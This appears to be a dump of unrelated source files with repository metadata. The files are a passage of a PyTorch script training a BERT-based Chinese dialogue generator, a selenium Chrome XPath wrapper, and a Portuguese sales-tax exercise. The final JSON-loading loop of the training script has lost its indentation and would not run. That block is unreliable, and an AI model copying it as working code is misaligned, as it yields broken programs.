    (del_punc_dup), pass 2 collapses 4x repeats to 3 (del_char_dup), each
    window size iterated to a fixed point. Finally wordpieces are re-glued
    ('##xx' joins the previous token) into a space-separated string.
    Mutates and returns `text`.
    """
    for i in tqdm(range(len(text))):
        text[i] = tokenizer.tokenize(text[i])
        # Pass 1: shrink window from len//2 to 1, repeating until stable.
        slide_len = len(text[i]) // 2
        while slide_len >= 1:
            origin_text = ''
            while text[i] != origin_text:
                origin_text = text[i]
                text[i] = del_punc_dup(text[i],slide_len,punc)
            slide_len -= 1
        # Pass 2: windows from len//4 down to 1, same fixed-point loop.
        slide_len = len(text[i]) // 4
        while slide_len >= 1:
            origin_text = ''
            while text[i] != origin_text:
                origin_text = text[i]
                text[i] = del_char_dup(text[i],slide_len)
            slide_len -= 1
        # Re-join wordpieces back into a whitespace-tokenized string.
        new = text[i][0]
        for j in range(1,len(text[i])):
            if len(text[i][j]) > 2 and text[i][j][:2] == '##':
                new = new + text[i][j][2:]
            else:
                new = new + ' ' + text[i][j]
        text[i] = new
    return text
questions = pre_process(questions, punc)
answers = pre_process(answers, punc)
# answer vocabulary
import collections
def get_dict(answers):
    """Build the decoder vocabulary (token -> id) from answer tokens.

    NOTE: mutates `answers` in place — each sentence becomes its token list.
    Chinese characters are kept when freq > 50, everything else when
    freq > 100; ids 0 and 1 are reserved for '[SEP]' and '[OOV]'.
    """
    char_answ = []
    for i in range(len(answers)):
        answers[i] = tokenizer.tokenize(answers[i])
        for j in range(len(answers[i])):
            char_answ.append(answers[i][j])
    answ_dict = collections.Counter(char_answ)
    # Stricter thresholds used for the full corpus, kept for reference:
    # rest_answ = dict(filter(lambda x: (x[1] > 250 and (x[0] >= '\u4e00' and x[0] <= '\u9fff')) or (x[1] > 500 and (x[0] < '\u4e00' or x[0] > '\u9fff')), answ_dict.items()))
    rest_answ = dict(filter(lambda x: (x[1] > 50 and (x[0] >= '\u4e00' and x[0] <= '\u9fff')) or (x[1] > 100 and (x[0] < '\u4e00' or x[0] > '\u9fff')), answ_dict.items()))
    count = 2
    for key in rest_answ.keys():
        rest_answ[key] = count
        count += 1
    rest_answ['[SEP]'], rest_answ['[OOV]'] = 0, 1
    return rest_answ
char2id = get_dict(answers)
id2char = {value:key for key, value in char2id.items()}
# print('词表数:', len(char2id)) # 2495 anger: 1918
# ids conversion
def id2id(ids, mode='bert2answ'):
    """Map one token id between the BERT vocab and the answer vocab.

    'bert2answ': BERT id -> answer-vocab id (1 == '[OOV]' when unknown).
    'answ2bert': answer-vocab id -> BERT id.
    Relies on module globals tokenizer / char2id / id2char.
    """
    if mode == 'bert2answ':
        text = tokenizer.convert_ids_to_tokens([ids])[0]
        if text in char2id.keys():
            ids = char2id[text]
        else:
            ids = 1
    elif mode == 'answ2bert':
        text = id2char[ids]
        ids = tokenizer.convert_tokens_to_ids(text)
    return ids
# train & valid data
# Sort QA pairs by answer length, longest first — presumably so samples in a
# batch have similar response lengths (TODO confirm intent).
temp = [(ques, answ) for ques, answ in zip(questions, answers)]
temp.sort(key = lambda i: len(i[1]), reverse=True)
questions = [ques for ques, answ in temp]
answers = [answ for ques, answ in temp]
def data_loader(ques, answ, batch_size, max_len, model):
    """Yield batches of training samples for the mask-prediction decoder.

    Each sample is a tuple:
      tokens       full sequence: question + [SEP] + answer + [SEP], padded
      temp_tokens  question + [SEP] only (the decoding buffer), padded
      segment_ids  0 for question part, 1 starting at the first answer slot
      input_mask   1 over the visible prefix, 0 over padding
      masked_pos   [index of the next answer position to predict]
      masked_tokens [answer-vocab id of the token at that position]
      resp_len     answer length + 1 (including trailing [SEP])
    The question is first noised via prediction_replace using `model`.
    """
    count = 0
    while count < len(ques):
        batch = []
        size = min(batch_size, len(ques) - count)
        for _ in range(size):
            part1 = tokenizer.encode(prediction_replace(ques[count], max_len, model))
            part2 = tokenizer.encode(answ[count])
            truncate_tokens(part1, part2, max_len-2)  # leave room for two [SEP]s
            tokens = part1 + token_id(['[SEP]']) + part2 + token_id(['[SEP]'])
            temp_tokens = part1 + token_id(['[SEP]'])
            num = len(part1)+1  # index of the first answer position
            segment_ids = [0]*(num) + [1]
            input_mask = [1]*(num+1)
            masked_tokens, masked_pos = [], []
            masked_tokens.append(id2id(tokens[num], mode='bert2answ'))
            masked_pos.append(num)
            n_pad = max_len - num - 1
            tokens.extend([0]*(max_len - len(tokens)))
            temp_tokens.extend([0]*(max_len - len(temp_tokens)))
            segment_ids.extend([0]*n_pad)
            input_mask.extend([0]*n_pad)
            batch.append((tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, len(part2)+1))
            count += 1
        yield batch
# using BERT to replace characters
def prediction_replace(sentence, max_len, model, rate=0.1):
    """Noise a sentence by replacing roughly `rate` of its tokens with
    BERT masked-LM predictions (only replacements that actually differ
    from the original token are counted). Returns the joined string.
    """
    output_text = tokenizer.tokenize(sentence)
    # Number of tokens to replace, scaled against the usable sequence length.
    num = int(len(output_text)//((max_len//2-1)/((max_len//2-1)*rate+1)))
    if num > 0:
        random_sequence = list(range(len(output_text)))
        random.shuffle(random_sequence)
        count = 0
        for index in random_sequence:
            tokenized_text = tokenizer.tokenize(sentence)
            reference_text = tokenized_text[index]
            tokenized_text[index] = '[MASK]'
            tokens_tensor = torch.tensor([tokenizer.convert_tokens_to_ids(tokenized_text)]).to(device)
            segments_ids = torch.tensor([[0] * len(tokenized_text)]).to(device)
            with torch.no_grad():
                outputs = model(tokens_tensor, token_type_ids=segments_ids)
            predicted_index = torch.argmax(outputs[0][0, index]).item()
            predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]
            if predicted_token != reference_text:
                count += 1
                output_text[index] = predicted_token
            if count >= num:
                break
    return ''.join(output_text)
# keeping max_len
def truncate_tokens(tokens_a, tokens_b, max_len):
    """Trim the two token lists IN PLACE, always popping from the end of the
    currently longer one (ties pop from tokens_b), until their combined
    length fits within max_len."""
    while len(tokens_a) + len(tokens_b) > max_len:
        longer = tokens_a if len(tokens_a) > len(tokens_b) else tokens_b
        longer.pop()
# Model: pretrained BERT encoder + transformer layers + generative decoder head
def gelu(x):
    """Exact GELU activation: x * Phi(x), with the Gaussian CDF expressed
    through the error function."""
    cdf = 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))
    return x * cdf
class Pre_trained(nn.Module):
    """Frozen pretrained BERT encoder used as a fixed feature extractor.

    Bug fix: the original declared ``model=BertModel.from_pretrained(...)``
    as the default ARGUMENT, which Python evaluates once when the class
    statement runs — i.e. merely importing this module loaded (and possibly
    downloaded) the weights. Loading lazily in ``__init__`` keeps the same
    interface (``Pre_trained()`` and ``Pre_trained(my_model)`` both work)
    while deferring that cost until an instance is actually built.
    """
    def __init__(self, model=None):
        super().__init__()
        # Load the default encoder lazily instead of at class-definition time.
        self.model = model if model is not None else BertModel.from_pretrained(pretrained_weights)
        # Freeze every parameter: BERT only provides features here.
        for p in self.parameters():
            p.requires_grad = False

    def forward(self, input_ids, segment_ids):
        """Encode padded id lists; returns the final hidden states."""
        input_ids = torch.tensor(input_ids).to(device)
        segment_ids = torch.tensor(segment_ids).to(device)
        self.model.eval()
        with torch.no_grad():
            hidden_states, _ = self.model(input_ids, token_type_ids=segment_ids)
        return hidden_states
class MultiHeadedSelfAttention(nn.Module):
    """Multi-head scaled dot-product self-attention over a (B, S, dim) input,
    with `dim` split evenly across `heads`."""
    def __init__(self, dim=768, drop=0.1, heads=12):
        super().__init__()
        self.proj_q = nn.Linear(dim, dim)
        self.proj_k = nn.Linear(dim, dim)
        self.proj_v = nn.Linear(dim, dim)
        self.drop = nn.Dropout(drop)
        self.scores = None  # last attention map, kept for inspection
        self.n_heads = heads
    def forward(self, x, mask):
        """mask: (B, S) with 1 = attend / 0 = padded, or None for no mask."""
        q, k, v = self.proj_q(x), self.proj_k(x), self.proj_v(x)
        # (B, S, D) -> (B, heads, S, D/heads)
        q, k, v = (self.split_last(x, (self.n_heads, -1)).transpose(1, 2) for x in [q, k, v])
        scores = q @ k.transpose(-2, -1) / np.sqrt(k.size(-1))
        if mask is not None:
            # Large negative bias on padded positions before the softmax.
            mask = mask[:, None, None, :].float()
            scores -= 10000.0 * (1.0 - mask)
        scores = self.drop(F.softmax(scores, dim=-1))
        h = (scores @ v).transpose(1, 2).contiguous()
        h = self.merge_last(h, 2)  # back to (B, S, D)
        self.scores = scores
        return h
    def split_last(self, x, shape):
        """Split x's last dimension into `shape` (at most one -1 allowed)."""
        shape = list(shape)
        assert shape.count(-1) <= 1
        if -1 in shape:
            shape[shape.index(-1)] = int(x.size(-1) / -np.prod(shape))
        return x.view(*x.size()[:-1], *shape)
    def merge_last(self, x, n_dims):
        """Flatten x's last `n_dims` dimensions into one."""
        s = x.size()
        assert n_dims > 1 and n_dims < len(s)
        return x.view(*s[:-n_dims], -1)
class PositionWiseFeedForward(nn.Module):
    """Position-wise two-layer MLP: expand `dim` by a factor of `ffn`,
    apply GELU, then project back down to `dim`."""
    def __init__(self, dim=768, ffn=4):
        super().__init__()
        hidden = dim * ffn
        self.fc1 = nn.Linear(dim, hidden)
        self.fc2 = nn.Linear(hidden, dim)
    def forward(self, x):
        return self.fc2(gelu(self.fc1(x)))
class BertLayer(nn.Module):
    """Transformer encoder layer with configurable parameter sharing.

    share: which sub-modules are shared across the `n_layers` virtual
    layers — 'none' | 'att' | 'ffn' | 'all'. Shared parts are single
    modules; unshared parts are ModuleLists indexed by `layer_num`.
    norm: 'pre' applies LayerNorm before each sub-layer, 'post' after the
    residual add. NOTE(review): the 'pre' path uses self.norm1 for BOTH
    sub-layers, leaving self.norm2 used only in 'post' mode — confirm
    whether that was intended.
    """
    def __init__(self, share='none', norm='pre', dim=768, eps=1e-12, drop=0.1, n_layers=4):
        super(BertLayer, self).__init__()
        self.share = share
        self.norm_pos = norm
        self.norm1 = nn.LayerNorm(dim, eps=eps)
        self.norm2 = nn.LayerNorm(dim, eps=eps)
        self.drop1 = nn.Dropout(drop)
        self.drop2 = nn.Dropout(drop)
        if self.share == 'ffn':
            self.attention = nn.ModuleList([MultiHeadedSelfAttention() for _ in range(n_layers)])
            self.proj = nn.ModuleList([nn.Linear(dim, dim) for _ in range(n_layers)])
            self.feedforward = PositionWiseFeedForward()
        elif self.share == 'att':
            self.attention = MultiHeadedSelfAttention()
            self.proj = nn.Linear(dim, dim)
            self.feedforward = nn.ModuleList([PositionWiseFeedForward() for _ in range(n_layers)])
        elif self.share == 'all':
            self.attention = MultiHeadedSelfAttention()
            self.proj = nn.Linear(dim, dim)
            self.feedforward = PositionWiseFeedForward()
        elif self.share == 'none':
            self.attention = nn.ModuleList([MultiHeadedSelfAttention() for _ in range(n_layers)])
            self.proj = nn.ModuleList([nn.Linear(dim, dim) for _ in range(n_layers)])
            self.feedforward = nn.ModuleList([PositionWiseFeedForward() for _ in range(n_layers)])
    def forward(self, hidden_states, attention_mask, layer_num):
        """One encoder pass; `layer_num` selects the unshared sub-modules."""
        attention_mask = torch.tensor(attention_mask).to(device)
        if self.norm_pos == 'pre':
            if isinstance(self.attention, nn.ModuleList):
                h = self.proj[layer_num](self.attention[layer_num](self.norm1(hidden_states), attention_mask))
            else:
                h = self.proj(self.attention(self.norm1(hidden_states), attention_mask))
            out = hidden_states + self.drop1(h)
            if isinstance(self.feedforward, nn.ModuleList):
                h = self.feedforward[layer_num](self.norm1(out))
            else:
                h = self.feedforward(self.norm1(out))
            out = out + self.drop2(h)
        if self.norm_pos == 'post':
            if isinstance(self.attention, nn.ModuleList):
                h = self.proj[layer_num](self.attention[layer_num](hidden_states, attention_mask))
            else:
                h = self.proj(self.attention(hidden_states, attention_mask))
            out = self.norm1(hidden_states + self.drop1(h))
            if isinstance(self.feedforward, nn.ModuleList):
                h = self.feedforward[layer_num](out)
            else:
                h = self.feedforward(out)
            out = self.norm2(out + self.drop2(h))
        return out
class Final_model(nn.Module):
    """Frozen BERT encoder + `n_layers` passes through one BertLayer +
    a decoder projecting gathered masked positions onto the answer vocab.

    NOTE: the n_vocab default (len(char2id)) is evaluated once, when this
    class statement runs, against the module-level vocabulary.
    """
    def __init__(self, n_layers=4, dim=768, eps=1e-12, n_vocab=len(char2id)):
        super().__init__()
        self.pre_trained = Pre_trained()
        self.n_layers = n_layers
        self.blocks = BertLayer()  # one layer object reused n_layers times (see BertLayer.share)
        self.fc2 = nn.Linear(dim, dim)
        self.norm = nn.LayerNorm(dim, eps=eps)
        self.decoder = nn.Linear(dim, n_vocab)
    def forward(self, input_ids, segment_ids, input_mask, masked_pos):
        h = self.pre_trained(input_ids, segment_ids)
        for i in range(self.n_layers):
            h = self.blocks(h, input_mask, i)
        # Gather the hidden states at the masked positions only.
        masked_pos = torch.tensor(masked_pos)[:, :, None].expand(-1, -1, h.size(-1)).to(device)
        h_masked = torch.gather(h, 1, masked_pos)
        h_masked = self.decoder(self.norm(gelu(self.fc2(h_masked))))
        return h_masked
# Training
def epoch_train(model, iterator, optimizer, epoch, max_len, miu=4, clip=True): # token-level (was: 词汇级)
    """One training epoch with scheduled sampling.

    samp follows an inverse-sigmoid schedule in `epoch`: with probability
    samp the ground-truth next token is fed back (teacher forcing),
    otherwise the model's own argmax prediction is appended. One optimizer
    step is taken per generated position per batch; returns mean loss.
    """
    samp = miu/(miu-1+math.exp(epoch/miu))
    print('teacher force rate: %3.3f'%samp)
    model.train()
    epoch_loss, count = 0, 0
    iter_bar = tqdm(iterator, desc='Training')
    for _, batch in enumerate(iter_bar): # in a batch
        tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, resp_len = zip(*batch)
        tokens, masked_tokens = torch.tensor(tokens).to(device), torch.tensor(masked_tokens).to(device)
        for _ in range(min(max(resp_len), max_len//2-1)): # in a sequence
            optimizer.zero_grad()
            output = model(temp_tokens, segment_ids, input_mask, masked_pos)
            loss = nn.CrossEntropyLoss(reduction='none')(output.transpose(1, 2), masked_tokens)
            loss = loss.mean()
            loss.backward()
            if clip:
                nn.utils.clip_grad_norm_(model.parameters(), 1.0)
            optimizer.step()
            count += 1
            epoch_loss += loss.item()
            iter_bar.set_description('loss=%3.3f'%loss.item())
            temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
            if max(masked_pos)[0] == max_len - 1:
                break  # buffer full
            if random.random() < samp:
                # Teacher forcing: append the ground-truth token.
                for i in range(len(resp_len)):
                    temp_tokens[i][masked_pos[i][0]] = int(tokens[i][masked_pos[i][0]])
                    segment_ids[i][masked_pos[i][0]+1] = 1
                    input_mask[i][masked_pos[i][0]+1] = 1
                    masked_pos[i][0] += 1
                    masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
            else:
                # Feed back the model's own argmax prediction.
                model.eval()
                with torch.no_grad():
                    pred = model(temp_tokens, segment_ids, input_mask, masked_pos)
                model.train()
                out = np.argsort(pred.cpu().detach().numpy())
                out_list = []
                for i in range(len(out)):
                    out_list.append(id2id(int(out[i][0][-1]), mode='answ2bert'))
                for i in range(len(resp_len)):
                    temp_tokens[i][masked_pos[i][0]] = out_list[i]
                    segment_ids[i][masked_pos[i][0]+1] = 1
                    input_mask[i][masked_pos[i][0]+1] = 1
                    masked_pos[i][0] += 1
                    masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
            temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
    return epoch_loss / count
def epoch_valid(model, iterator, max_len):
    """One validation epoch: like epoch_train but with no gradient updates
    and no teacher forcing — the model always consumes its own argmax
    prediction. Returns the mean per-position loss.
    """
    model.eval()
    epoch_loss, count = 0, 0
    with torch.no_grad():
        iter_bar = tqdm(iterator, desc='Validation')
        for _, batch in enumerate(iter_bar):
            tokens, temp_tokens, segment_ids, input_mask, masked_pos, masked_tokens, resp_len = zip(*batch)
            tokens, masked_tokens = torch.tensor(tokens).to(device), torch.tensor(masked_tokens).to(device)
            for _ in range(min(max(resp_len), max_len//2-1)):
                output = model(temp_tokens, segment_ids, input_mask, masked_pos)
                loss = nn.CrossEntropyLoss(reduction='none')(output.transpose(1, 2), masked_tokens)
                loss = loss.mean()
                count += 1
                epoch_loss += loss.item()
                iter_bar.set_description('loss=%3.3f'%loss.item())
                temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
                if max(masked_pos)[0] == max_len - 1:
                    break  # buffer full
                out = np.argsort(output.cpu().detach().numpy())
                out_list = []
                for i in range(len(out)):
                    out_list.append(id2id(int(out[i][0][-1]), mode='answ2bert'))
                for i in range(len(resp_len)):
                    temp_tokens[i][masked_pos[i][0]] = out_list[i]
                    segment_ids[i][masked_pos[i][0]+1] = 1
                    input_mask[i][masked_pos[i][0]+1] = 1
                    masked_pos[i][0] += 1
                    masked_tokens[i][0] = id2id(int(tokens[i][masked_pos[i][0]]), mode='bert2answ')
                temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
    return epoch_loss / count
# BEAM Search
import copy
import heapq
from gensim.summarization import bm25
bm25_ques = bm25.BM25(questions)
bm25_answ = bm25.BM25(answers)
def epoch_test(ques, model_1, max_len, beam=3): # str list
    """Generate one reply per question via beam search of width `beam`,
    then pick the final answer among the beam candidates with BM25
    re-ranking (see bm25 below).

    Each question's buffer is replicated `beam` times; decoding stops when
    every candidate contains a second '[SEP]' or the buffer is full.
    Returns a list of answer strings, one per input question.
    """
    ques = pre_process(ques, punc)
    temp_tokens, segment_ids, input_mask, masked_pos, answers = [], [], [], [], []
    for i in range(len(ques)):
        # Build the padded question prefix and replicate it beam times.
        token = tokenizer.encode(ques[i])[:max_len//2-1] + token_id(['[SEP]'])
        num = len(token)
        ids = [0]*(num) + [1]
        mask = [1]*(num+1)
        n_pad = max_len - num - 1
        token.extend([0]*(max_len - len(token)))
        ids.extend([0]*n_pad)
        mask.extend([0]*n_pad)
        for _ in range(beam):
            temp_tokens.append(copy.deepcopy(token))
            segment_ids.append(ids)
            input_mask.append(mask)
            masked_pos.append([num])
    model_1.eval()
    with torch.no_grad():
        for _ in range(max_len//2-1):
            # Stop when buffers are full or every beam has produced its closing [SEP].
            if max(masked_pos)[0] == max_len - 1 or min(lists.count(token_id(['[SEP]'])[0]) for lists in temp_tokens) >= 2:
                break
            temp_tokens, segment_ids, input_mask, masked_pos = tuple(temp_tokens), tuple(segment_ids), tuple(input_mask), tuple(masked_pos)
            output = model_1(temp_tokens, segment_ids, input_mask, masked_pos)
            temp_tokens, segment_ids, input_mask, masked_pos = list(temp_tokens), list(segment_ids), list(input_mask), list(masked_pos)
            out = np.argsort(output.cpu().detach().numpy())
            scores = [0]*len(temp_tokens)
            k_tokens, k_scores = [], []
            # Top-`beam` candidate tokens (BERT ids) and softmax scores per row.
            for i in range(len(temp_tokens)):
                for j in range(beam):
                    k_tokens.append(id2id(int(out[i][0][-1-j]), mode='answ2bert'))
                    k_scores.append(F.softmax(output.cpu().detach(), dim=-1).numpy()[i][0][int(out[i][0][-1-j])])
            # Sort each question's beam*beam expansion by score, best first.
            for i in range(0,len(k_tokens),beam*beam):
                temp_list = [(score, token) for score, token in zip(k_scores[i:i+beam*beam], k_tokens[i:i+beam*beam])]
                temp_list.sort(key = lambda i: i[0], reverse=True)
                k_scores[i:i+beam*beam] = [score for score, token in temp_list]
                k_tokens[i:i+beam*beam] = [token for score, token in temp_list]
            # Extend each beam with its ranked candidate and advance the cursor.
            for i in range(len(scores)):
                count = 0
                if i % beam != 0:
                    if scores[i] + k_scores[i//beam*beam*beam+i%beam+count] == scores[i-1]:
                        count += 1
                        scores[i] += k_scores[i//beam*beam*beam+i%beam+count]
                        temp_tokens[i][masked_pos[i][0]] = k_tokens[i//beam*beam*beam+i%beam+count]
                    else:
                        scores[i] += k_scores[i//beam*beam*beam+i%beam+count]
                        temp_tokens[i][masked_pos[i][0]] = k_tokens[i//beam*beam*beam+i%beam+count]
                else:
                    scores[i] += k_scores[i*beam]
                    temp_tokens[i][masked_pos[i][0]] = k_tokens[i*beam]
                segment_ids[i][masked_pos[i][0]+1] = 1
                input_mask[i][masked_pos[i][0]+1] = 1
                masked_pos[i][0] += 1
    # Decode each beam back to text and let BM25 pick the final answer.
    for i in range(len(ques)):
        for j in range(beam):
            temp_tokens[i*beam+j] = tokenizer.convert_ids_to_tokens(temp_tokens[i*beam+j])
            start = temp_tokens[i*beam+j].index('[SEP]')
            temp_tokens[i*beam+j] = temp_tokens[i*beam+j][start+1:]
            if '[SEP]' in temp_tokens[i*beam+j]:
                end = temp_tokens[i*beam+j].index('[SEP]')
                temp_tokens[i*beam+j] = temp_tokens[i*beam+j][:end]
            while '[PAD]' in temp_tokens[i*beam+j]:
                temp_tokens[i*beam+j].remove('[PAD]')
            while '[UNK]' in temp_tokens[i*beam+j]:
                temp_tokens[i*beam+j].remove('[UNK]')
            temp_tokens[i*beam+j] = ''.join(temp_tokens[i*beam+j])
        answers.append(bm25(bm25_ques, bm25_answ, ques[i], temp_tokens[i*beam:(i+1)*beam]))
    return answers
def bm25(bm25_ques, bm25_answ, question, answers, k=4):
    """Re-rank candidate `answers` for `question`.

    The k most similar training questions are found via bm25_ques; each
    candidate is then scored by sum(q_score * a_score) over those indices
    against bm25_answ, and the best-scoring candidate is returned (first
    one on ties).
    """
    q_scores = bm25_ques.get_scores(question)
    top_k = heapq.nlargest(k, q_scores)
    picked = [idx for idx, sc in enumerate(q_scores) if sc in top_k]
    weights = []
    for cand in answers:
        a_scores = bm25_answ.get_scores(cand)
        weights.append(sum(q_scores[idx] * a_scores[idx] for idx in picked))
    return answers[weights.index(max(weights))]
import os
def model_train(model, mask_model, ques_t, answ_t, test_ques, batch_size, max_len, learning_rate, epochs, load=False):
    """Full training driver: Adam + ReduceLROnPlateau, per-epoch validation
    on a random VALID-sized slice, checkpointing on every new best loss.

    Writes a CSV-ish log and sample generations under /home/<ser>/STC3/result.
    load=True resumes from the hard-coded 7.844.pt checkpoint at epoch 5.
    Early-stops after 6 epochs without improvement (stop > 5).
    Relies on module globals: ser, VALID, and the epoch_* functions.
    """
    log_file = '/home/'+ser+'/STC3/result/log_anger.txt'
    out_file = '/home/'+ser+'/STC3/result/out_anger.txt'
    if load == True:
        load_model(model, '/home/'+ser+'/STC3/result/7.844.pt')
        start = 5
    else:
        with open(log_file, 'w') as log_f:
            log_f.write('epoch, train_loss, valid_loss\n')
        with open(out_file, 'w') as out_f:
            out_f.write(str(test_ques) + '\n')
        start = 0
    optimizer = optim.Adam(model.parameters(),lr=learning_rate)
    scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=2, verbose=True)
    stop = 0
    loss_list = []
    for epoch in range(start, epochs):
        # Random contiguous slice of the training data used for validation.
        r = random.randint(0,len(ques_t)-VALID)
        train_iterator = data_loader(ques_t,answ_t, batch_size, max_len, mask_model)
        valid_iterator = data_loader(ques_t[r:r+VALID],answ_t[r:r+VALID], batch_size, max_len, mask_model)
        print('Epoch: ' + str(epoch+1))
        train_loss = epoch_train(model, train_iterator, optimizer, epoch, max_len)
        valid_loss = epoch_valid(model, valid_iterator, max_len)
        scheduler.step(valid_loss)
        loss_list.append(valid_loss)
        with open(log_file, 'a') as log_f:
            log_f.write('{epoch},{train_loss: 3.3f},{valid_loss: 3.3f}\n'.format(epoch=epoch+1, train_loss=train_loss, valid_loss=valid_loss))
        if valid_loss == min(loss_list):
            # New best: reset patience, dump sample generations, save weights.
            stop = 0
            with open(out_file, 'a') as out_f:
                out_f.write(str(valid_loss)[:5] + '\n')
                out_f.write(str(epoch_test(test_ques, model, 64)) + '\n')
            torch.save(model.state_dict(), os.path.join('/home/'+ser+'/STC3/result/', str(valid_loss)[:5]+'.pt'))
        else:
            stop += 1
        if stop > 5: # patience**2+1
            break
def load_model(model, model_file):
    """Populate `model` in place with the state dict stored at `model_file`
    and return the same model object."""
    state = torch.load(model_file)
    model.load_state_dict(state)
    return model
# Load the test questions from the evaluation JSON
import json
test_ques = []
with open('/home/'+ser+'/STC3/result/TUA1_1_TokushimaUniversity_base.json', 'r') as f:
for line in f:
a = json.loads(line)
for i in range(40):
test_ques.append(a[i][0][0])
VALID = 16384
model_train(Final_model().to(device), mask_model, questions, answers, test_ques, 256, 64, 0.0001, 999, load=True)
| [
"noreply@github.com"
] | youngzhou97qz.noreply@github.com |
2a2c4f282db59df7b5982790c4dc520ab0a9ae84 | d6d07a60a6acabe0652caddfb7b9f47392abfce0 | /umihico/scraping/chrome.py | 7dd997e8e34eb51a891a533bc729347f488070be | [] | no_license | umihico/umihico-pypi | 5d378d94753f94c45cea3c01a6e4c49b73183bd4 | f7de0e8df96b97d7ad4c92851cc742814db494c3 | refs/heads/master | 2022-03-10T08:39:09.456769 | 2018-11-10T06:18:21 | 2018-11-10T06:18:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py |
from selenium.webdriver import Chrome as originChrome
from selenium.webdriver import ChromeOptions
import itertools as _itertools
class Chrome(originChrome):
    """selenium Chrome driver with XPath convenience helpers.

    Lookups that fail in the main document are retried inside each
    top-level <frame> via anti_frame_xpath, and every returned element is
    augmented with helper methods by edit_element.
    """
    def _xpath(self, want_as_list, xpath):
        """Shared lookup: list of elements when want_as_list, else a single
        element (raising when none is found anywhere)."""
        if want_as_list:
            elements = self.find_elements_by_xpath(
                xpath) or anti_frame_xpath(self, xpath)
            for e in elements:
                edit_element(e)
            return elements
        else:
            try:
                element = self.find_element_by_xpath(xpath)
                edit_element(element)
                return element
            except Exception as e:
                # Not in the main document: search each frame before giving up.
                elements = anti_frame_xpath(self, xpath)
                if elements:
                    edit_element(elements[0])
                    return elements[0]
                raise
    def xpath(self, xpath):
        """Return the first element matching `xpath`."""
        return self._xpath(False, xpath)
    def xpaths(self, xpath):
        """Return all elements matching `xpath` (possibly empty)."""
        return self._xpath(True, xpath)
    def click(self, xpath):
        """Click the first element matching `xpath`."""
        return self.xpath(xpath).click()
    def send_keys(self, xpath, *keys):
        """Send `keys` to the first element matching `xpath`."""
        return self.xpath(xpath).send_keys(*keys)
    def exist(self, xpath):
        """True when at least one element matches `xpath`."""
        return bool(len(self.xpaths(xpath)))
    def text(self, xpath):
        """Text of the first element matching `xpath`."""
        return self.xpath(xpath).text
    def texts(self, xpath):
        """Texts of all elements matching `xpath`."""
        return [e.text for e in self.xpaths(xpath)]
    def get_attribute(self, xpath, attribute):
        # Bug fix: the original had no `return`, so this always returned None.
        return self.xpath(xpath).get_attribute(attribute)
    def get_attributes(self, xpath, attribute):
        """`attribute` value for every element matching `xpath`."""
        return [element.get_attribute(attribute) for element in self.xpaths(xpath)]
def anti_frame_xpath(chrome, xpath):
    """Search each top-level <frame> in turn for elements matching `xpath`.

    Returns the first non-empty match list, or [] once every frame has
    been tried. Leaves the driver switched into the last visited frame.
    """
    frame_index = 0
    while True:
        try:
            chrome.switch_to.parent_frame()
        except Exception:
            pass  # already at the top-level document
        frames = chrome.find_elements_by_tag_name("frame")
        if frame_index >= len(frames):
            return []
        chrome.switch_to_frame(frames[frame_index])
        hits = chrome.find_elements_by_xpath(xpath)
        if hits:
            return hits
        frame_index += 1
def gen_chtomeoptions():
    """Build ChromeOptions with a maximized window and no info bars."""
    opts = ChromeOptions()
    for flag in ("--start-maximized", "--disable-infobars"):
        opts.add_argument(flag)
    return opts
def edit_element(element):
    """Attach xpath/xpaths/exist helper callables onto a WebElement in place.

    Bug fix: the original did ``element.exist = exist`` with a plain
    two-argument function ``exist(self, xpath)``. A function stored on an
    *instance* attribute is not bound, so ``element.exist(xp)`` raised
    TypeError (missing argument). A closure over the element fixes that
    while keeping the one-argument call signature callers expect.
    """
    element.xpath = element.find_element_by_xpath
    element.xpaths = element.find_elements_by_xpath
    def exist(xpath, _element=element):
        return bool(len(_element.xpaths(xpath)))
    element.exist = exist
| [
"umihico_dummy@users.noreply.github.com"
] | umihico_dummy@users.noreply.github.com |
f8e54ed7de4fa1713441907b2b002188d27537c3 | d7da288db4fd9fc0bb1c60c5074f290b5f70c8ef | /Aulas Python/Conteúdo das Aulas/033/Gabarito/Exercício 1 - Gabarito.py | 897f4b881fb6433e5d3d0ea8f4c4d834a4d639ac | [] | no_license | luizdefranca/Curso-Python-IgnoranciaZero | dbf4cf342b3f3efea6fb3b8cf27bf39ed92927e9 | 9fbf2f25e3e6fce1f1582af0bd6bc7dbc5b9f588 | refs/heads/master | 2020-04-09T07:17:00.735378 | 2016-09-12T10:51:37 | 2016-09-12T10:51:37 | 67,999,169 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | """
Faça um programa com uma função chamada somaImposto.
A função possui dois parâmetros formais:
1 - taxaImposto, que é a quantia de imposto sobre vendas expressa em
porcentagem
2 - custo, que é o custo de um item antes do imposto.
A função “altera” o valor de custo para incluir o imposto sobre vendas.
"""
def somaImposto(taxaImposto, custo):
    """Return `custo` increased by `taxaImposto` percent sales tax."""
    fator = 1 + taxaImposto / 100
    return custo * fator
custo_normal = float(input("Digite o custo(R$): "))
taxa = float(input("Digite a taxa de imposto(%): "))
print("O custo recalculado com o imposto é de R$%.2f"%somaImposto(custo_normal, taxa))
| [
"luizramospe@hotmail.com"
] | luizramospe@hotmail.com |
a23d7eb0986e35a380e694c33ea645d2021db241 | 8f40f6b22dc896335abed7ce21d8f427efbf70b5 | /src/eschool/settings.py | 0ccb8669178e03a4f3b02d1dc39611c7f0a287e7 | [
"MIT"
